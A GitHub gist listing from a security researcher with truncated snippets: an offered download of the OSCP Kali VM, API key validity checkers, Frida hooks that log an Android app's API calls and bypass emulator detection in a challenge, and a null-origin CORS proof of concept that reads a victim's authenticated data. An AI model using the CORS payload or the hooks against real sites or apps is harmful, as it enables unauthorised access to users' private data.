Skip to content

Instantly share code, notes, and snippets.

Avatar
🧠
Looting knowledge.

αvιcoder avicoder

🧠
Looting knowledge.
View GitHub Profile
@avicoder
avicoder / OffsecVM_KALI.md
Last active Jul 11, 2020
Offensive Security OSCP PWK Kali 2017 VM
View OffsecVM_KALI.md

If you're also searching for it then you can download from my Google drive here:

https://drive.google.com/file/d/1wVKSkTJHxC2JHlEmjLYeV4MmfG-eVLcy/view?usp=sharing

thank me later!

@avicoder
avicoder / reg.md
Last active Jan 21, 2019
Regex Fun
View reg.md
  • 1

/d+

#2

([\da-f]{2}:?){6}

#3

@avicoder
avicoder / gcp-api-key-check.py
Created Aug 31, 2018
Check the google api key is valid or not.
View gcp-api-key-check.py
import googlemaps
from datetime import datetime
gmaps = googlemaps.Client(key='Add Your Key here')
# Geocoding an address
geocode_result = gmaps.geocode('1600 Amphitheatre Parkway, Mountain View, CA')
# Look up an address with reverse geocoding
reverse_geocode_result = gmaps.reverse_geocode((40.714224, -73.961452))
@avicoder
avicoder / Mapbox.py
Created May 16, 2018
Check for key validation
View Mapbox.py
from mapbox import Geocoder
def banner():
return "\n[*] "
def mapbox():
API_TOKEN = raw_input("Enter the Mapbox API key here and press enter:\n")
token_type = API_TOKEN[:2]
@avicoder
avicoder / list-url.py
Created Apr 30, 2018
Frida script to get the list of all API calls from a twitter android app in real time.
View list-url.py
#! /usr/bin/python
# Usage `python list-url.py`
import frida,sys
jspayload= """
setImmediate(function() {
@avicoder
avicoder / reverzeMe1.js
Created Apr 27, 2018
ReverzeMe solution in frida
View reverzeMe1.js
setImmediate(function() {
Java.perform(function() {
//Saving retval
retval = Java.use("java.lang.Boolean").$new("False");
chalJNI = Java.use("com.example.reverzeme.ChallengeJNI");
chalJNI.checkIfDeviceIsEmulator.implementation = function(v) {
View android-load-classes.js
"use strict";
/* Check if a Java/Dalvik/ART VM is available */
if (Java.available) {
//FIX - Need to be inside perform
Java.perform(function() {
/* enumerate loaded classes */
View Null-origin-code.html
<html>
<body>
<iframe src='data:text/html,<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://vuln-app.com/confidential", true);
xhr.withCredentials = true;
xhr.onload = function () {
if (xhr.readyState === xhr.DONE) {
console.log(xhr.response);
}
View Keybase.md

Keybase proof

I hereby claim:

  • I am avicoder on github.
  • I am avicoder (https://keybase.io/avicoder) on keybase.
  • I have a public key ASA5E3ToP1__j0WJ0hVsfEKPF-t9pWa1Ka31uZpGM32rawo

To claim this, I am signing this object: